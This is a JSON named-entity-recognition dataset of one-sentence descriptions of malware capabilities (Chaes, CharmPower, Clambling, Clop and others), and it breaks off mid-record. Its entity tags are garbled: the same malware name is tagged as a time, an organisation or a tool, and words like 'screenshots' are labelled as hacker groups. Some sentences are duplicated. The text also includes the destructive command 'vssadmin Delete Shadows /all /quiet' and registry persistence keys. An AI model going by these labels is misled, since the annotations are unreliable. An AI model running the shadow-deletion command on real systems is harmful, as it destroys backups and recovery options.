{ "tokens": [ "Chaes", "has", "decrypted", "an", "AES", "encrypted", "binary", "file", "to", "trigger", "the", "download", "of", "other", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "encryption", "for", "its", "C2", "channel." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "exfiltrated", "its", "collected", "data", "from", "the", "infected", "machine", "to", "the", "C2,", "sometimes", "using", "the", "MIME", "protocol." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Some", "versions", "of", "Chaes", "stored", "its", "instructions", "(otherwise", "in", "a", "`instructions.ini`", "file)", "in", "the", "Registry." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "can", "download", "additional", "files", "onto", "an", "infected", "machine." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "a", "module", "to", "perform", "any", "API", "hooking", "it", "desires." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "Installutill", "to", "download", "content." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "JavaScript", "and", "Node.Js", "information", "stealer", "script", "that", "exfiltrates", "data", "using", "the", "node", "process." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "requires", "the", "user", "to", "click", "on", "the", "malicious", "Word", "document", "to", "execute", "the", "next", "part", "of", "the", "attack." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "an", "unsigned,", "crafted", "DLL", "module", "named", "<code>hha.dll</code>", "that", "was", "designed", "to", "look", "like", "a", "legitimate", "32-bit", "Windows", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SecTeam" ] }, { "tokens": [ "Chaes", "can", "modify", "Registry", "values", "to", "stored", "information", "and", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", ".MSI", "files", "as", "an", "initial", "way", "to", "start", "the", "infection", "chain." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "used", "the", "<code>CreateFileW()</code>", "API", "function", "with", "read", "permissions", "to", "access", "downloaded", "payloads." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "Python", "scripts", "for", "execution", "and", "the", "installation", "of", "additional", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Chaes", "has", "added", "persistence", "via", "the", "Registry", "key", "<code>software\\microsoft\\windows\\currentversion\\run\\microsoft", "windows", "html", "help</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "can", "capture", "screenshots", "of", "the", "infected", "machine." ], "ner_tags": [ "B-Time", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "been", "delivered", "by", "sending", "victims", "a", "phishing", "email", "containing", "a", "malicious", ".docx", "file." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Chaes", "has", "used", "Base64", "to", "encode", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "a", "script", "that", "extracts", "the", "web", "session", "cookie", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "collected", "system", "information,", "including", "the", "machine", "name", "and", "OS", "version." ], "ner_tags": [ "B-Time", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "collected", "the", "username", "and", "UID", "from", "the", "infected", "machine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "changed", "the", "template", "target", "of", "the", "settings.xml", "file", "embedded", "in", "the", "Word", "document", "and", "populated", "that", "field", "with", "the", "downloaded", "URL", "of", "the", "next", "payload." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "VBscript", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "cmd", "to", "execute", "tasks", "on", "the", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaos", "conducts", "brute", "force", "attacks", "against", "SSH", "services", "to", "gain", "initial", "access." ], "ner_tags": [ "B-HackOrg", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "After", "initial", "compromise,", "Chaos", "will", "download", "a", "second", "stage", "to", "establish", "a", "more", "permanent", "presence", "on", "the", "affected", "system." ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaos", "provides", "a", "reverse", "shell", "connection", "on", "8338/TCP,", "encrypted", "via", "AES." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Chaos", "provides", "a", "reverse", "shell", "is", "triggered", "upon", "receipt", "of", "a", "packet", "with", "a", "special", "string,", "sent", "to", "any", "port." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaos", "provides", "a", "reverse", "shell", "connection", "on", "8338/TCP,", "encrypted", "via", "AES." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CharmPower", "can", "collect", "data", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "retrieve", "C2", "domain", "information", "from", "actor-controlled", "S3", "buckets." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "CharmPower", "can", "decrypt", "downloaded", "modules", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "exfiltrate", "gathered", "data", "to", "a", "hardcoded", "C2", "URL", "via", "HTTP", "POST." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "CharmPower", "can", "send", "victim", "data", "via", "FTP", "with", "credentials", "hardcoded", "in", "the", "script." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "change", "its", "C2", "channel", "once", "every", "360", "loops", "by", "retrieving", "a", "new", "domain", "from", "the", "actors’", "S3", "bucket." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "delete", "created", "files", "from", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "enumerate", "drives", "and", "list", "the", "contents", "of", "the", "C:", "drive", "on", "a", "victim's", "computer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "has", "the", "ability", "to", "download", "additional", "modules", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "remove", "persistence-related", "artifacts", "from", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "use", "PowerShell", "for", "payload", "execution", "and", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "has", "the", "ability", "to", "list", "running", "processes", "through", "the", "use", "of", "`tasklist`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "has", "the", "ability", "to", "enumerate", "`Uninstall`", "registry", "values." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "has", "the", "ability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "CharmPower", "can", "list", "the", "installed", "applications", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "send", "additional", "modules", "over", "C2", "encoded", "with", "base64." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "send", "additional", "modules", "over", "C2", "encrypted", "with", "a", "simple", "substitution", "cipher." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "enumerate", "the", "OS", "version", "and", "computer", "name", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "has", "the", "ability", "to", "use", "<code>ipconfig</code>", "to", "enumerate", "system", "network", "settings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "use", "`netsh", "wlan", "show", "profiles`", "to", "list", "specific", "Wi-Fi", "profile", "details." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "use", "HTTP", "to", "communicate", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CharmPower", "can", "download", "additional", "modules", "from", "actor-controlled", "Amazon", "S3", "buckets." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "C#", "implementation", "of", "the", "CharmPower", "command", "execution", "module", "can", "use", "<code>cmd</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "CharmPower", "can", "use", "`wmic`", "to", "gather", "information", "from", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Cheerscrypt", "can", "encrypt", "data", "on", "victim", "machines", "using", "a", "Sosemanuk", "stream", "cipher", "with", "an", "Elliptic-curve", "Diffie–Hellman", "(ECDH)", "generated", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cheerscrypt", "can", "search", "for", "log", "and", "VMware-related", "files", "with", ".log,", ".vmdk,", ".vmem,", ".vswp,", "and", ".vmsn", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Cheerscrypt", "has", "the", "ability", "to", "terminate", "VM", "processes", "on", "compromised", "hosts", "through", "execution", "of", "`esxcli", "vm", "process", "kill`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "variants", "of", "Cherry", "Picker", "use", "AppInit_DLLs", "to", "achieve", "persistence", "by", "creating", "the", "following", "Registry", "key:", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows", "\"AppInit_DLLs\"=\"pserver32.dll\"</code>" ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Cherry", "Picker", "exfiltrates", "files", "over", "FTP." ], "ner_tags": [ "B-Tool", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Recent", "versions", "of", "Cherry", "Picker", "delete", "files", "and", "registry", "keys", "created", "by", "the", "malware." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-Tool", "B-SecTeam", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "upload", "local", "files." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "list", "directory", "contents." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "download", "remote", "files." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "spider", "authentication", "portals." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "perform", "brute", "force", "password", "guessing", "against", "authentication", "portals." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "client", "component", "is", "packed", "with", "UPX." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "can", "change", "the", "timestamp", "of", "files." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "executes", "code", "sent", "via", "HTTP", "POST", "commands." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "is", "a", "Web", "Shell", "payload." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "China", "Chopper's", "server", "component", "is", "capable", "of", "opening", "a", "command", "terminal." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chinoxy", "can", "use", "a", "digitally", "signed", "binary", "(\"Logitech", "Bluetooth", "Wizard", "Host", "Process\")", "to", "load", "its", "dll", "into", "memory." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Chinoxy", "dropping", "function", "can", "initiate", "decryption", "of", "its", "config", "file." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chinoxy", "has", "encrypted", "its", "configuration", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chinoxy", "has", "used", "the", "name", "`eoffice.exe`", "in", "attempt", "to", "appear", "as", "a", "legitimate", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chinoxy", "has", "established", "persistence", "via", "the", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "registry", "key", "and", "by", "loading", "a", "dropper", "to", "`(%COMMON_", "STARTUP%\\\\eoffice.exe)`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "encrypt", "and", "store", "on", "disk", "collected", "data", "before", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "collect", "data", "from", "a", "local", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "decrypt", "its", "encrypted", "internal", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "encrypt", "sections", "of", "its", "code", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "exfiltrate", "collected", "data", "via", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Chrommme", "can", "download", "its", "code", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "store", "captured", "system", "information", "locally", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "use", "Windows", "API", "including", "`WinExec`", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "set", "itself", "to", "sleep", "before", "requesting", "a", "new", "command", "from", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "has", "the", "ability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Chrommme", "has", "the", "ability", "to", "list", "drives", "and", "obtain", "the", "computer", "name", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "enumerate", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chrommme", "can", "retrieve", "the", "username", "from", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "use", "Telnet", "for", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Clambling", "can", "use", "Dropbox", "to", "download", "malicious", "payloads,", "send", "commands,", "and", "receive", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Features", "B-HackOrg", "B-HackOrg", "I-Features", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "bypass", "UAC", "using", "a", "`passuac.dll`", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "capture", "and", "store", "clipboard", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Clambling", "can", "store", "a", "file", "named", "`mpsvc.dll`,", "which", "opens", "a", "malicious", "`mpsvc.mui`", "file,", "in", "the", "same", "folder", "as", "the", "legitimate", "Microsoft", "executable", "`MsMpEng.exe`", "to", "gain", "execution." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "deobfuscate", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "send", "files", "from", "a", "victim's", "machine", "to", "Dropbox." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Clambling", "can", "browse", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "set", "its", "file", "attributes", "to", "hidden." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "capture", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "gained", "execution", "through", "luring", "victims", "into", "opening", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Clambling", "can", "set", "and", "delete", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "enumerate", "network", "shares." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "use", "TCP", "and", "UDP", "for", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Features" ] }, { "tokens": [ "The", "Clambling", "executable", "has", "been", "obfuscated", "when", "dropped", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Clambling", "dropper", "can", "use", "PowerShell", "to", "download", "the", "malware." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "enumerate", "processes", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "execute", "binaries", "through", "process", "hollowing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "inject", "into", "the", "`svchost.exe`", "process", "for", "execution." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "enumerate", "Registry", "keys,", "including", "<code>KEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir</code>", "to", "search", "for", "a", "bitcoin", "wallet." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "establish", "persistence", "by", "adding", "a", "Registry", "run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Clambling", "can", "create", "and", "start", "services", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "been", "delivered", "to", "victim's", "machines", "through", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Clambling", "can", "discover", "the", "hostname,", "computer", "name,", "and", "Windows", "version", "of", "a", "targeted", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "enumerate", "the", "IP", "address", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "determine", "the", "current", "time." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "wait", "30", "minutes", "before", "initiating", "contact", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "record", "screen", "content", "in", "AVI", "format." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Clambling", "has", "the", "ability", "to", "communicate", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Clambling", "can", "use", "cmd.exe", "for", "command", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Clambling", "can", "register", "itself", "as", "a", "system", "service", "to", "gain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "use", "code", "signing", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "encrypt", "files", "using", "AES,", "RSA,", "and", "RC4", "and", "will", "add", "the", "\".clop\"", "extension", "to", "encrypted", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "B-Way", "B-Way", "O", "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "used", "a", "simple", "XOR", "operation", "to", "decrypt", "strings." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "uninstall", "or", "disable", "security", "products." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "searched", "folders", "and", "subfolders", "for", "files", "to", "encrypt." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "delete", "the", "shadow", "volumes", "with", "<code>vssadmin", "Delete", "Shadows", "/all", "/quiet</code>", "and", "can", "use", "bcdedit", "to", "disable", "recovery", "options." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "make", "modifications", "to", "Registry", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "use", "msiexec.exe", "to", "disable", "security", "tools", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "used", 